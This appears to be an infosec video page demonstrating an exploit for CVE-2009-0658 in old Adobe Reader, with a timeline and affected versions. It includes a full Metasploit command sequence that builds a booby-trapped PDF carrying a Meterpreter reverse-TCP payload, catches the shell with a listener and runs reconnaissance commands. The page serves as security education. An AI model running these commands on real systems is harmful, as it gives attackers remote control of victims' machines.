Description: Timeline :
Exploit discovered in the wild the 2009-02-19
Milw0rm PoC provided by Guido Landi the 2009-02-23
Metasploit PoC provided by Nathan Keltner the 2009-03-26
PoC provided by:
natron
xort
redsand
MC
Didier Stevens
Reference(s) :
CVE-2009-0658
Affected versions :
Adobe Reader and Adobe Acrobat Professional 9.0.0
Adobe Reader and Adobe Acrobat Professional prior to version 8.1.4
Adobe Reader and Adobe Acrobat Professional prior to version 7.1.1
Tested on Windows XP SP3 with Adobe Reader 9.0.0
Description :
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.
Metasploit demo :
use exploit/windows/fileformat/adobe_jbig2decode
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sessions -i 1
sysinfo
getuid
ipconfig
Owned !
Tags: metasploit , windows , microsoft , adobe , acrobat , reader , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.